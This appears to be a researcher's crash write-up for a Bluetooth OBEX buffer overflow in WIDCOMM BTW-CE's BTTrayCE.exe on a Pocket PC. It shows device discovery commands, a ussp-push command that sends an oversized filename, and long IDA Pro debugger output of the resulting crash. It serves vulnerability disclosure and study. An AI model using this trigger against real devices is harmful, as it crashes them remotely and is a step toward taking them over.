BTTrayCE.exe normally runs from \Windows\Startup on my PocketPC (ipaq 2215) device. I am currently running version WIDCOMM BTW-CE 1.4.1 Build60 In order to debug this issue you must first remove this file from the startup folder and Soft boot the ipaq. Open Up IDA Pro Advanced 4.9 32 bit and choose Debugger -> Run -> Remote WinCE debugger. When the box comes up an asks for the path to the file type in "\Windows\BTTrayCE.exe" and press OK. You need to trigger the overflow from a remote machine with bluetooth enabled. kfinisterre@animosity:~/ussp-push-0.4$ hcitool scan Scanning ... 00:04:3E:65:A1:C8 Pocket_PC kfinisterre@animosity:~/ussp-push-0.4$ sdptool browse 00:04:3E:65:A1:C8 Browsing 00:04:3E:65:A1:C8 ... ... Service Name: OBEX Object Push Service RecHandle: 0x10001 Service Class ID List: "OBEX Object Push" (0x1105) Protocol Descriptor List: "L2CAP" (0x0100) "RFCOMM" (0x0003) Channel: 2 "OBEX" (0x0008) Language Base Attr List: code_ISO639: 0x656e encoding: 0x6a base_offset: 0x100 Profile Descriptor List: "OBEX Object Push" (0x1105) Version: 0x0100 ... The following ussp-push command should trigger the overflow. animosity:/home/kfinisterre/ussp-push-0.4# ./ussp-push 00:04:3E:65:A1:C8@2 /etc/hosts `perl -e 'print "A" x 232'` pushing file /etc/hosts name=/etc/hosts, size=257 Registered transport set user data created new objext Local device 00:20:E0:4C:CF:DF Remote device 00:04:3E:65:A1:C8 (2) started a new request reqdone Command (00) has now finished, rsp: 20Connected! Connection return code: 0, id: 0 Connection established connected to server Sending file: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, path: /etc/hosts, size: 257 reqdone When the program crashes this is where we are. coredll.dll:01F83AA0 loc_1F83AA0 ; CODE XREF: coredll.dll:01F83AA8j coredll.dll:01F83AA0 LDR R0, [R1,R0]! coredll.dll:01F83AA4 $r0 is 41414141 $r1 is 240555A8 debug837:240555A8 This is exactly AT $r1... debug837:240555A8 DCB 0x41 ; A debug837:240555A9 DCB 0x41 ; A debug837:240555AA DCB 0x41 ; A debug837:240555AB DCB 0x41 ; A debug837:240555AC DCB 0x41 ; A debug837:240555AD DCB 0x41 ; A debug837:240555AE DCB 0x41 ; A debug837:240555AF DCB 0x41 ; A debug837:240555B0 DCB 0x41 ; A debug837:240555B1 DCB 0x41 ; A debug837:240555B2 DCB 0x41 ; A debug837:240555B3 DCB 0x41 ; A debug837:240555B4 DCB 0x41 ; A debug837:240555B5 DCB 0x41 ; A debug837:240555B6 DCB 0x41 ; A debug837:240555B7 DCB 0x41 ; A debug837:240555B8 DCB 0x41 ; A debug837:240555B9 DCB 0x41 ; A debug837:240555BA DCB 0x41 ; A debug837:240555BB DCB 0x41 ; A debug837:240555BC DCB 0x41 ; A debug837:240555BD DCB 0x41 ; A debug837:240555BE DCB 0x41 ; A debug837:240555BF DCB 0x41 ; A debug837:240555C0 DCB 0x41 ; A debug837:240555C1 DCB 0x41 ; A debug837:240555C2 DCB 0x41 ; A debug837:240555C3 DCB 0x41 ; A debug837:240555C4 DCB 0x41 ; A debug837:240555C5 DCB 0x41 ; A debug837:240555C6 DCB 0x41 ; A debug837:240555C7 DCB 0x41 ; A debug837:240555C8 DCB 0x41 ; A debug837:240555C9 DCB 0x41 ; A debug837:240555CA DCB 0x41 ; A debug837:240555CB DCB 0x41 ; A debug837:240555CC DCB 0x41 ; A debug837:240555CD DCB 0x41 ; A debug837:240555CE DCB 0x41 ; A debug837:240555CF DCB 0x41 ; A debug837:240555D0 DCB 0x41 ; A debug837:240555D1 DCB 0x41 ; A debug837:240555D2 DCB 0x41 ; A debug837:240555D3 DCB 0x41 ; A debug837:240555D4 DCB 0x41 ; A debug837:240555D5 DCB 0x41 ; A debug837:240555D6 DCB 0x41 ; A debug837:240555D7 DCB 0x41 ; A debug837:240555D8 DCB 0x41 ; A debug837:240555D9 DCB 0x41 ; A debug837:240555DA DCB 0x41 ; A debug837:240555DB DCB 0x41 ; A debug837:240555DC DCB 0x41 ; A debug837:240555DD DCB 0x41 ; A debug837:240555DE DCB 0x41 ; A debug837:240555DF DCB 0x41 ; A debug837:240555E0 DCB 0x41 ; A debug837:240555E1 DCB 0x41 ; A debug837:240555E2 DCB 0x41 ; A debug837:240555E3 DCB 0x41 ; A debug837:240555E4 DCB 0x41 ; A debug837:240555E5 DCB 0x41 ; A debug837:240555E6 DCB 0x41 ; A debug837:240555E7 DCB 0x41 ; A debug837:240555E8 DCB 0x41 ; A debug837:240555E9 DCB 0x41 ; A debug837:240555EA DCB 0x41 ; A debug837:240555EB DCB 0x41 ; A debug837:240555EC DCB 0x41 ; A debug837:240555ED DCB 0x41 ; A debug837:240555EE DCB 0x41 ; A debug837:240555EF DCB 0x41 ; A debug837:240555F0 DCB 0x53 ; S debug837:240555F1 DCB 0 This is the data before $r1 debug837:240554FC DCB 0x5C ; \ debug837:240554FD DCB 0 debug837:240554FE DCB 0x54 ; T debug837:240554FF DCB 0 debug837:24055500 DCB 0x65 ; e debug837:24055501 DCB 0 debug837:24055502 DCB 0x6D ; m debug837:24055503 DCB 0 debug837:24055504 DCB 0x70 ; p debug837:24055505 DCB 0 debug837:24055506 DCB 0x5C ; \ debug837:24055507 DCB 0 debug837:24055508 DCB 0x41 ; A debug837:24055509 DCB 0x41 ; A debug837:2405550A DCB 0x41 ; A debug837:2405550B DCB 0x41 ; A debug837:2405550C DCB 0x41 ; A debug837:2405550D DCB 0x41 ; A debug837:2405550E DCB 0x41 ; A debug837:2405550F DCB 0x41 ; A debug837:24055510 DCB 0x41 ; A debug837:24055511 DCB 0x41 ; A debug837:24055512 DCB 0x41 ; A debug837:24055513 DCB 0x41 ; A debug837:24055514 DCB 0x41 ; A debug837:24055515 DCB 0x41 ; A debug837:24055516 DCB 0x41 ; A debug837:24055517 DCB 0x41 ; A debug837:24055518 DCB 0x41 ; A debug837:24055519 DCB 0x41 ; A debug837:2405551A DCB 0x41 ; A debug837:2405551B DCB 0x41 ; A debug837:2405551C DCB 0x41 ; A debug837:2405551D DCB 0x41 ; A debug837:2405551E DCB 0x41 ; A debug837:2405551F DCB 0x41 ; A debug837:24055520 DCB 0x41 ; A debug837:24055521 DCB 0x41 ; A debug837:24055522 DCB 0x41 ; A debug837:24055523 DCB 0x41 ; A debug837:24055524 DCB 0x41 ; A debug837:24055525 DCB 0x41 ; A debug837:24055526 DCB 0x41 ; A debug837:24055527 DCB 0x41 ; A debug837:24055528 DCB 0x41 ; A debug837:24055529 DCB 0x41 ; A debug837:2405552A DCB 0x41 ; A debug837:2405552B DCB 0x41 ; A debug837:2405552C DCB 0x41 ; A debug837:2405552D DCB 0x41 ; A debug837:2405552E DCB 0x41 ; A debug837:2405552F DCB 0x41 ; A debug837:24055530 DCB 0x41 ; A debug837:24055531 DCB 0x41 ; A debug837:24055532 DCB 0x41 ; A debug837:24055533 DCB 0x41 ; A debug837:24055534 DCB 0x41 ; A debug837:24055535 DCB 0x41 ; A debug837:24055536 DCB 0x41 ; A debug837:24055537 DCB 0x41 ; A debug837:24055538 DCB 0x41 ; A debug837:24055539 DCB 0x41 ; A debug837:2405553A DCB 0x41 ; A debug837:2405553B DCB 0x41 ; A debug837:2405553C DCB 0x41 ; A debug837:2405553D DCB 0x41 ; A debug837:2405553E DCB 0x41 ; A debug837:2405553F DCB 0x41 ; A debug837:24055540 DCB 0x41 ; A debug837:24055541 DCB 0x41 ; A debug837:24055542 DCB 0x41 ; A debug837:24055543 DCB 0x41 ; A debug837:24055544 DCB 0x41 ; A debug837:24055545 DCB 0x41 ; A debug837:24055546 DCB 0x41 ; A debug837:24055547 DCB 0x41 ; A debug837:24055548 DCB 0x41 ; A debug837:24055549 DCB 0x41 ; A debug837:2405554A DCB 0x41 ; A debug837:2405554B DCB 0x41 ; A debug837:2405554C DCB 0x41 ; A debug837:2405554D DCB 0x41 ; A debug837:2405554E DCB 0x41 ; A debug837:2405554F DCB 0x41 ; A debug837:24055550 DCB 0x41 ; A debug837:24055551 DCB 0x41 ; A debug837:24055552 DCB 0x41 ; A debug837:24055553 DCB 0x41 ; A debug837:24055554 DCB 0x41 ; A debug837:24055555 DCB 0x41 ; A debug837:24055556 DCB 0x41 ; A debug837:24055557 DCB 0x41 ; A debug837:24055558 DCB 0x41 ; A debug837:24055559 DCB 0x41 ; A debug837:2405555A DCB 0x41 ; A debug837:2405555B DCB 0x41 ; A debug837:2405555C DCB 0x41 ; A debug837:2405555D DCB 0x41 ; A debug837:2405555E DCB 0x41 ; A debug837:2405555F DCB 0x41 ; A debug837:24055560 DCB 0x41 ; A debug837:24055561 DCB 0x41 ; A debug837:24055562 DCB 0x41 ; A debug837:24055563 DCB 0x41 ; A debug837:24055564 DCB 0x41 ; A debug837:24055565 DCB 0x41 ; A debug837:24055566 DCB 0x41 ; A debug837:24055567 DCB 0x41 ; A debug837:24055568 DCB 0x41 ; A debug837:24055569 DCB 0x41 ; A debug837:2405556A DCB 0x41 ; A debug837:2405556B DCB 0x41 ; A debug837:2405556C DCB 0x41 ; A debug837:2405556D DCB 0x41 ; A debug837:2405556E DCB 0x41 ; A debug837:2405556F DCB 0x41 ; A debug837:24055570 DCB 0x41 ; A debug837:24055571 DCB 0x41 ; A debug837:24055572 DCB 0x41 ; A debug837:24055573 DCB 0x41 ; A debug837:24055574 DCB 0x41 ; A debug837:24055575 DCB 0x41 ; A debug837:24055576 DCB 0x41 ; A debug837:24055577 DCB 0x41 ; A debug837:24055578 DCB 0x41 ; A debug837:24055579 DCB 0x41 ; A debug837:2405557A DCB 0x41 ; A debug837:2405557B DCB 0x41 ; A debug837:2405557C DCB 0x41 ; A debug837:2405557D DCB 0x41 ; A debug837:2405557E DCB 0x41 ; A debug837:2405557F DCB 0x41 ; A debug837:24055580 DCB 0x41 ; A debug837:24055581 DCB 0x41 ; A debug837:24055582 DCB 0x41 ; A debug837:24055583 DCB 0x41 ; A debug837:24055584 DCB 0x41 ; A debug837:24055585 DCB 0x41 ; A debug837:24055586 DCB 0x41 ; A debug837:24055587 DCB 0x41 ; A debug837:24055588 DCB 0x41 ; A debug837:24055589 DCB 0x41 ; A debug837:2405558A DCB 0x41 ; A debug837:2405558B DCB 0x41 ; A debug837:2405558C DCB 0x41 ; A debug837:2405558D DCB 0x41 ; A debug837:2405558E DCB 0x41 ; A debug837:2405558F DCB 0x41 ; A debug837:24055590 DCB 0x41 ; A debug837:24055591 DCB 0x41 ; A debug837:24055592 DCB 0x41 ; A debug837:24055593 DCB 0x41 ; A debug837:24055594 DCB 0x41 ; A debug837:24055595 DCB 0x41 ; A debug837:24055596 DCB 0x41 ; A debug837:24055597 DCB 0x41 ; A debug837:24055598 DCB 0x41 ; A debug837:24055599 DCB 0x41 ; A debug837:2405559A DCB 0x41 ; A debug837:2405559B DCB 0x41 ; A debug837:2405559C DCB 0x41 ; A debug837:2405559D DCB 0x41 ; A debug837:2405559E DCB 0x41 ; A debug837:2405559F DCB 0x41 ; A debug837:240555A0 DCB 0x41 ; A debug837:240555A1 DCB 0x41 ; A debug837:240555A2 DCB 0x41 ; A debug837:240555A3 DCB 0x41 ; A debug837:240555A4 DCB 0x41 ; A debug837:240555A5 DCB 0x41 ; A debug837:240555A6 DCB 0x41 ; A debug837:240555A7 DCB 0x41 ; A bytes pages size description --------- ----- ---- -------------------------------------------- 262144 32 8192 allocating memory for b-tree... 65536 8 8192 allocating memory for virtual array... 262144 32 8192 allocating memory for name pointers... ----------------------------------------------------------------- 589824 total memory allocated Loading IDP module C:\Program Files\IDA\procs\pc.w32 for processor metapc...OK Autoanalysis subsystem has been initialized. Unloading IDP module C:\Program Files\IDA\procs\pc.w32... Loading IDP module C:\Program Files\IDA\procs\arm.w32 for processor arm...OK Connection to the Windows CE device has been established. Debugger: Process started: \Windows\BTTrayCE.exe Possible file format: PE executable (C:\Program Files\IDA\loaders\dbg.ldw) Possible file format: MS-DOS executable (EXE) (C:\Program Files\IDA\loaders\dos.ldw) Possible file format: Portable executable for ARM (PE) (C:\Program Files\IDA\loaders\pe.ldw) Loading file '\Windows\BTTrayCE.exe' into database... Detected file format: Portable executable for ARM (PE) 1015. Creating a new segment (00011000-00026A00) ... ... OK 1016. Creating a new segment (00027000-00029A00) ... ... OK 1017. Creating a new segment (0002A000-00033600) ... ... OK 1018. Creating a new segment (00034000-00035600) ... ... OK 1019. Creating a new segment (00036000-00037400) ... ... OK Reading exports directory... Reading imports directory... 1020. Creating a new segment (0002A4F8-00033600) ... ... OK Assuming __cdecl calling convention by default Flushing buffers, please wait...ok File '\Windows\BTTrayCE.exe' is successfully loaded into the database. Compiling file 'C:\Program Files\IDA\idc\ida.idc'... Executing function 'main'... Compiling file 'C:\Program Files\IDA\idc\onload.idc'... Executing function 'OnLoad'... IDA is analysing the input file... You may start to explore the input file right now. Debugger: Library loaded: \Windows\olece300.dll Debugger: Library loaded: \Windows\doclist.dll Debugger: Library loaded: \Windows\mfcce300.dll Debugger: Library loaded: \Windows\BTChooserLib.dll Debugger: Library loaded: \Windows\wbtapiCE.dll Debugger: Library loaded: \Windows\note_prj.dll Debugger: Library loaded: \Windows\toolhelp.dll Debugger: Library loaded: \Windows\ceshell.dll Debugger: Library loaded: \Windows\shutil.dll Debugger: Library loaded: \Windows\tshres.dll Debugger: Library loaded: \Windows\commctrl.dll Debugger: Library loaded: \Windows\oleaut32.dll Debugger: Library loaded: \Windows\ossvcs.dll Debugger: Library loaded: \Windows\aygshell.dll Debugger: Library loaded: \Windows\ole32.dll Debugger: Library loaded: \Windows\coredll.dll The initial autoanalysis has been finished. Debugger: Thread started: id=334B0892, entry=00022360. Debugger: Library loaded: \Windows\btrez.dll Debugger: Thread started: id=B329EFDA, entry=01744594. Debugger: Library loaded: \Windows\richink.dll Debugger: Library loaded: \Windows\ws2.dll Debugger: Library loaded: \Windows\winsock.dll Debugger: Library loaded: \Windows\chngtrk.dll Debugger: Library loaded: \Windows\outres.dll Debugger: Library loaded: \Windows\cemapi.dll Debugger: Library loaded: \Windows\BTCeOsif4.dll Debugger: Library loaded: \Windows\pimutil.dll Debugger: Library loaded: \Windows\calstore.dll Debugger: Library loaded: \Windows\pimstore.dll Debugged application message: Data Abort: Thread=935f0400 Proc=900d84b8 'BTTrayCE.exe'. Debugged application message: AKY=00020001 PC=01f83aa0 RA=01f839dc BVA=684a991c FSR=000000f5. BTTrayCE.exe: The instruction at 0x1F83AA0 referenced memory at 0x684A991C. The memory could not be read (0x01F83AA0 -> 684A991C)